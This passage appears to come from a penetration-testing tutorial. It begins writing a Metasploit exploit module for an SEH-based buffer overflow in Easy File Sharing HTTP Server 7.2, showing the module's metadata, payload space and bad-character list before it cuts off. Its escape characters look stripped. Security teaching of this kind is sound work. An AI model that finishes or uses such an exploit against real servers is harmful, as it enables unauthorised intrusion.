Now that we have all the important data for exploiting the target application, let's go ahead and create an exploit module in Metasploit, as follows:
class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Easy File Sharing HTTP Server 7.2 SEH Overflow', 'Description' => %q{ This module demonstrate SEH based overflow example }, 'Author' => 'Nipun', 'License' => MSF_LICENSE, 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread', 'RPORT' => 80, }, 'Payload' => { 'Space' => 390, 'BadChars' => "x00x7ex2bx26x3dx25x3ax22x0ax0dx20x2fx5cx2e", }, 'Platform' => 'win', ...